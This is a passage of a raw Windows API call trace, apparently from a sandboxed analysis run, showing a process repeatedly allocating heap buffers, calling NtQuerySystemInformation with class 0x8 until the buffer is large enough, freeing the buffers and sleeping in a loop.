0xc0000004 [0290.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0290.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0290.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0290.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0290.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0290.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.895] Sleep (dwMilliseconds=0x110) [0290.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0290.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0290.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0290.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0290.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0290.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0290.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0290.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0290.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.912] Sleep (dwMilliseconds=0x110) [0290.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0290.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0290.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0290.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0290.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0290.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0290.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0290.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0290.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.926] Sleep (dwMilliseconds=0x110) [0290.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0290.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0290.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0290.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0290.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0290.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0290.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0290.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0290.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.938] Sleep (dwMilliseconds=0x110) [0290.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0290.996] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.997] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0290.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0290.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0290.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0290.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0290.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0290.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0290.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.000] Sleep (dwMilliseconds=0x110) [0291.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0291.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0291.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0291.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0291.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0291.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0291.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0291.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0291.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.020] Sleep (dwMilliseconds=0x110) [0291.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0291.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0291.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0291.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0291.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0291.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0291.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0291.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0291.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.036] Sleep (dwMilliseconds=0x110) [0291.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0291.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0291.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0291.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0291.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0291.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0291.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0291.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0291.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.051] Sleep (dwMilliseconds=0x110) [0291.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0291.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0291.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0291.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0291.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0291.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0291.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0291.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0291.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.065] Sleep (dwMilliseconds=0x110) [0291.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0291.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0291.085] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0291.085] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0291.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0291.088] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0291.089] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0291.089] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0291.089] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.090] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.090] Sleep (dwMilliseconds=0x110) [0291.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0291.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0291.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0291.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0291.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0291.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0291.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0291.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0291.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.116] Sleep (dwMilliseconds=0x110) [0291.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0291.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0291.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0291.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0291.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0291.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0291.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0291.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0291.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.128] Sleep (dwMilliseconds=0x110) [0291.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0291.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0291.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0291.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0291.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0291.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0291.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0291.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0291.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.141] Sleep (dwMilliseconds=0x110) [0291.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0291.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0291.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0291.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0291.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0291.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0291.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0291.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0291.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.162] Sleep (dwMilliseconds=0x110) [0291.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0291.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0291.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, 